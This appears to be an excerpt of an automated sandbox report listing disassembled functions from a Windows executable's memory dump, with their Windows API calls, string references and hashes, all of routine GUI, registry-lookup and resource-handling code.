Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 89dfaf82e07744e740ffc8bfdfae17c727da84fa35a04fc415532cded519b5c5
Instruction ID: f12a968bad139cac2e5ef99bdd093966571c695a92ed49e16074415eeaf800bb
Opcode Fuzzy Hash: 89dfaf82e07744e740ffc8bfdfae17c727da84fa35a04fc415532cded519b5c5
Instruction Fuzzy Hash: 96014931500346ABCB217F63DC49B2B7BE1EF04711F008866F546961A0EBB1D890AA25

Function 00BE3099 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00BE30BA
GetClassNameA.USER32(?,?,0000000A), ref: 00BE30CF
CompareStringA.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 00BE30E9

Strings

combobox, xrefs: 00BE30D7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: ed5d63dd0fae5f48dde2e6f9ec60d768694a5f3dd3dd48ab890ed346afc41e91
Instruction ID: a0c0c2c9847b6c8e0dc35ba3a86343e47fed3c4c031d7be6e693e1b0372c7107
Opcode Fuzzy Hash: ed5d63dd0fae5f48dde2e6f9ec60d768694a5f3dd3dd48ab890ed346afc41e91
Instruction Fuzzy Hash: 52F028316102687FCB11EB68CC89FBE77E8EB15B20F100754F422EB1C0DB30AA018696

Function 00C7179B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000002), ref: 00C717C2
GetFocus.USER32 ref: 00C717CE
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00C717FF

Strings

y, xrefs: 00C717AC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FocusKillRedrawTimerWindow
String ID: y
API String ID: 1950525498-4225443349
Opcode ID: 32217f30ef42c5289cc1b2b3fee62dbaad7af5a516a558305fb7be9184f67ab9
Instruction ID: 3e02bc5ef2b386c819e71b9b037dc4ddb642a39f908e01d9a514b9e2213de498
Opcode Fuzzy Hash: 32217f30ef42c5289cc1b2b3fee62dbaad7af5a516a558305fb7be9184f67ab9
Instruction Fuzzy Hash: 58F0F631500344EFDB349B6ACC09B6977E8BB01712F69C42DF86E890A0D7B09E40DF51

Function 00BD4D11 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD4D23
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00BD4D33

Strings

Advapi32.dll, xrefs: 00BD4D1E
RegCreateKeyTransactedA, xrefs: 00BD4D2D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedA
API String ID: 1646373207-1184998024
Opcode ID: 7a53c0dd5f1b463fe304b61158f7d8623df9ccdaa6beb8985ad10c2b579d6592
Instruction ID: 3a38d9b5ed3602fe9dee9b8af3c3f5a8fbf62702975cf1825917e0d981fb213b
Opcode Fuzzy Hash: 7a53c0dd5f1b463fe304b61158f7d8623df9ccdaa6beb8985ad10c2b579d6592
Instruction Fuzzy Hash: 54F03732100259BFCF221F919D08FEEBBA6EB48751F044466FA55951A0D772D860EB50

Function 00BDA23C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BDA250
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00BDA260

Strings

Advapi32.dll, xrefs: 00BDA24B
RegDeleteKeyTransactedA, xrefs: 00BDA25A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedA
API String ID: 1646373207-1972538232
Opcode ID: 9765a6cb4c7ed8f5b57f7218821f5beec11b9c3f5c987271c84f418c65ae8871
Instruction ID: db418ae0f6ba85dc2b9ef5571b00a1dc74c1c5eea3b7a4cb659ae10a96fe44f4
Opcode Fuzzy Hash: 9765a6cb4c7ed8f5b57f7218821f5beec11b9c3f5c987271c84f418c65ae8871
Instruction Fuzzy Hash: 61F08232200184BB87611BA79C08D6BFFA9EBC1B623244977F155C5110E772DC45DA62

Function 00BD4CB8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD4CCA
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00BD4CDA

Strings

Advapi32.dll, xrefs: 00BD4CC5
RegOpenKeyTransactedA, xrefs: 00BD4CD4

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedA
API String ID: 1646373207-496252237
Opcode ID: 847ac38d4bb5571341a3677b18bc415606866d54d4f54d983eaa7af04524e925
Instruction ID: 5c0217b1220ad5643f431f2b219dec7264f7ea46419587b732af7d13b4a078a4
Opcode Fuzzy Hash: 847ac38d4bb5571341a3677b18bc415606866d54d4f54d983eaa7af04524e925
Instruction Fuzzy Hash: 4EF08232100249FFCB211FA1DC08FAABBEAEF04751F0488B6F941961A0E771DC60DBA1

Function 00C02A92 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00C02AA4
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 00C02AB4

Strings

kernel32.dll, xrefs: 00C02A9F
GetFileAttributesTransactedA, xrefs: 00C02AAE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetFileAttributesTransactedA$kernel32.dll
API String ID: 1646373207-3426858862
Opcode ID: 4df411c0c63ca32de70e8d765655f556c5865e7f78ed59960da278838a44f55e
Instruction ID: c62fb1c4009f1a6c6360c70587abb73c525d3b60db799898d18146add8fbeebf
Opcode Fuzzy Hash: 4df411c0c63ca32de70e8d765655f556c5865e7f78ed59960da278838a44f55e
Instruction Fuzzy Hash: 26F01C32200245EFCF315FA59C0CB9A7BA8EB04B51F058839B515954E0DA719590EB61

Function 00C47A46 Relevance: 6.4, APIs: 4, Instructions: 435COMMON

Download Yara Rule

APIs

Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80A6
Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80B3

Part of subcall function 00C453FD: SetRectEmpty.USER32(?), ref: 00C4540A
Part of subcall function 00C453FD: GetWindowRect.USER32(?,?), ref: 00C4541B

IsRectEmpty.USER32(?), ref: 00C47AA7
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00C47B38
GetWindowRect.USER32(?,?), ref: 00C47DD7
EqualRect.USER32(?,?), ref: 00C47DF0

Part of subcall function 00C457F6: GetWindowRect.USER32(?,?), ref: 00C4582D
Part of subcall function 00C457F6: OffsetRect.USER32(?,00000000,?), ref: 00C45857

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$ClientEmptyScreen$EqualOffsetRedraw
String ID:
API String ID: 1200911113-0
Opcode ID: 9ac76d6d09ceef3adab76e2a903036e3f06e739e74eea095b8987634d4031d5c
Instruction ID: 74542e9f8befec177d88c779c3e63aed31e6356a8bf1bf28503499092a54470d
Opcode Fuzzy Hash: 9ac76d6d09ceef3adab76e2a903036e3f06e739e74eea095b8987634d4031d5c
Instruction Fuzzy Hash: 97F15E71E04208DFCF24DFA9C984AAEBBB5FF44310F18426AE815AB255DB309E46DF51

Function 00C19155 Relevance: 6.3, APIs: 4, Instructions: 258keyboardCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C19181
GetKeyState.USER32(00000011), ref: 00C19189
IsRectEmpty.USER32(?), ref: 00C191E6
GetWindowRect.USER32(?,?), ref: 00C19363

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$StateWindow
String ID:
API String ID: 2684165152-0
Opcode ID: 515fce49acde031aba73de141ed0a100d00bcde983bd675e05077e7e0353a78a
Instruction ID: f94c5d8e68982f0b67e64e52fceb36e8072663efcacc5dc6da19ff2e8c5d4777
Opcode Fuzzy Hash: 515fce49acde031aba73de141ed0a100d00bcde983bd675e05077e7e0353a78a
Instruction Fuzzy Hash: D4919231A002059FDF15DFA5C895BEE7BB5FF4A310F144169F915AB290CB30AD81EBA0

Function 00C14DF9 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C14E3C
CopyRect.USER32(?,?), ref: 00C14E47
GetClientRect.USER32(?,?), ref: 00C14E60
SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00C14FF6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientCopyInfoParametersSystemWindow
String ID:
API String ID: 1264264222-0
Opcode ID: cf39f8c4c0f7f4bcb88cdd59ddc2dc0024363c5f4b0807a7ccc6ef12088c180a
Instruction ID: f12675352c1f777b64768c8b3538892a8ebc535aadcae4a9b223f4d07a899062
Opcode Fuzzy Hash: cf39f8c4c0f7f4bcb88cdd59ddc2dc0024363c5f4b0807a7ccc6ef12088c180a
Instruction Fuzzy Hash: D481F971D00219EFCF14DFE8D9889EDBBB5FF49740F108169E816AB244D730AA85DB91

Function 00C3B8F2 Relevance: 6.2, APIs: 4, Instructions: 187windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 00C3B99D
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C3B9B7
GetObjectA.GDI32(?,00000018,?), ref: 00C3BAC0

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

InvalidateRect.USER32(?,00000000,00000001,?,00000000,?,?,?), ref: 00C3BB53

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CompatibleCreate$BitmapException@8H_prolog3InvalidateObjectRectThrow
String ID:
API String ID: 103296630-0
Opcode ID: 774c4815cb953bedef3401c1f0b53f46e7ad7429da89740aecc1eddf92794ca2
Instruction ID: 9cac44da3f2f67f89ed7dbf220d3ef58ed3439c5091cd43d04e2a8628fdba24d
Opcode Fuzzy Hash: 774c4815cb953bedef3401c1f0b53f46e7ad7429da89740aecc1eddf92794ca2
Instruction Fuzzy Hash: 16717C71910698AFCB25DB60CC55AEEB7F9EF48304F1044D9F91AA3291DBB06E84DF21

Function 00BFB9F4 Relevance: 6.2, APIs: 4, Instructions: 187COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BFBA1E
InflateRect.USER32(?,00000002,00000002), ref: 00BFBBB6
InvalidateRect.USER32(?,?,00000001), ref: 00BFBBC5
UpdateWindow.USER32(?), ref: 00BFBBCE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$InflateInvalidateParentUpdateWindow
String ID:
API String ID: 4005937429-0
Opcode ID: 152e52a7418e7f35d35444fdbc7f21c5d3c055f3e79cb282fc023a15a3022665
Instruction ID: 61d937773ee73c8096045983460e4d0ea7036d5019d08c5e9344ec4f8a600192
Opcode Fuzzy Hash: 152e52a7418e7f35d35444fdbc7f21c5d3c055f3e79cb282fc023a15a3022665
Instruction Fuzzy Hash: A451B371A00608AFCB15DF69C881EBEBBF6FF84350F1441AAE905A7261EB70DE45CB50

Function 00BF2BD7 Relevance: 6.2, APIs: 4, Instructions: 183COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,000000F1), ref: 00BF2C01

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

LoadResource.KERNEL32(?,00000000), ref: 00BF2C14
LockResource.KERNEL32(00000000), ref: 00BF2C22
FreeResource.KERNEL32(?), ref: 00BF2DC6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Resource$Exception@8FindFreeH_prolog3LoadLockThrow
String ID:
API String ID: 1564530344-0
Opcode ID: d716b439cc57f7ea9c0d18a3ed97c27d4c6308c8782e2b65d94a6b0e2ddf0aa3
Instruction ID: f39eec54e6b6f0baccb1a8ee000e9197153f159f8c0b33a71c9659376d3486df
Opcode Fuzzy Hash: d716b439cc57f7ea9c0d18a3ed97c27d4c6308c8782e2b65d94a6b0e2ddf0aa3
Instruction Fuzzy Hash: 7461C174A0020AAFDB199F60C895BBEB7F4FF44344F1085AAE90697261EB709E44DB60

Function 00C22A17 Relevance: 6.2, APIs: 4, Instructions: 175COMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 00C22AEE
IsWindow.USER32(?), ref: 00C22B3E
SetRectEmpty.USER32(?), ref: 00C22BBA
SetRectEmpty.USER32(?), ref: 00C22BC0

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyRect$Window
String ID:
API String ID: 1945993337-0
Opcode ID: 2b695d6c582a6275407631eef3f816df3ed62bb738b9dcb4327b0f6c26599a1f
Instruction ID: 11d917af2f368bffee52b2026fe6805f287a9bcc65345672ad32c8a70b13a872
Opcode Fuzzy Hash: 2b695d6c582a6275407631eef3f816df3ed62bb738b9dcb4327b0f6c26599a1f
Instruction Fuzzy Hash: 3B515A31A00615DFDB15DF68D884BAA77F9FF48300F1502A9EC16AF656DB70AE41CBA0

Function 00CC9BB0 Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CC9BBE

Part of subcall function 00CC6553: __getptd.LIBCMT ref: 00CC6566

Part of subcall function 00CC74FC: __getptd_noexit.LIBCMT ref: 00CC74FC

__stricmp_l.LIBCMT ref: 00CC9C2B

Part of subcall function 00CD2F89: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CD2F98

___crtLCMapStringA.LIBCMT ref: 00CC9C81
___crtLCMapStringA.LIBCMT ref: 00CC9D02

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 9ee7e966dacd1d9710b460f55c9045ea176903b89c31216c94f791183a34354d
Instruction ID: 621ea0a8911d76e9e0647fa293b546da76240d0c01e1935ef70996666b30f830
Opcode Fuzzy Hash: 9ee7e966dacd1d9710b460f55c9045ea176903b89c31216c94f791183a34354d
Instruction Fuzzy Hash: 0D51F871904199ABDF25DB69C489FBDBBF0EB01324F28429DE0B26B1D2C7748E41DB50

Function 00C40BBA Relevance: 6.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C40C80
GetSysColorBrush.USER32(0000000F), ref: 00C40CE9
SetClassLongA.USER32(?,000000F6,00000000), ref: 00C40CF5
GetWindowRect.USER32(?,?), ref: 00C40D18

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: BrushClassColorLongRectWindow_memset
String ID:
API String ID: 2638262843-0
Opcode ID: cf5f4ec64f4d4a6bbf33fee41885b2015bd73dcef86264f3959b92a88f3648bf
Instruction ID: d15aab81546f871ac34bd3a7199daeb549b43e867b508a69547afd8df6dc66d8
Opcode Fuzzy Hash: cf5f4ec64f4d4a6bbf33fee41885b2015bd73dcef86264f3959b92a88f3648bf
Instruction Fuzzy Hash: 0F612AB1E00249DFCF10DFA9C885AAEBBF9BF48310F10452AE516E7251DB74A941DF51

Function 00C455B2 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C45627
GetWindowRect.USER32(?,?), ref: 00C45684
IsRectEmpty.USER32(?), ref: 00C45693
OffsetRect.USER32(?,00000000,?), ref: 00C4570B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$OffsetWindow
String ID:
API String ID: 3444667153-0
Opcode ID: fdf7f169d9d5d6bda21933f8a3f12a659d5ceb1c80ebebcf05ef8729bcc55128
Instruction ID: 5c1469361d88e17c1e397a6baae181ffaddbbaf47c57a2dbeeda0017f9d03d5c
Opcode Fuzzy Hash: fdf7f169d9d5d6bda21933f8a3f12a659d5ceb1c80ebebcf05ef8729bcc55128
Instruction Fuzzy Hash: 8E51F471E00A59DFCF21CFA9C984AEEB7B5BB08700F55056AF925A7211C770AE40CFA1

Function 00C9625C Relevance: 6.2, APIs: 4, Instructions: 157COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C9628E
SetRectEmpty.USER32(?), ref: 00C96320
SetRect.USER32(?,0000000A,?,?), ref: 00C96357
CopyRect.USER32(?,?), ref: 00C96390

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CopyEmptyWindow
String ID:
API String ID: 2176940440-0
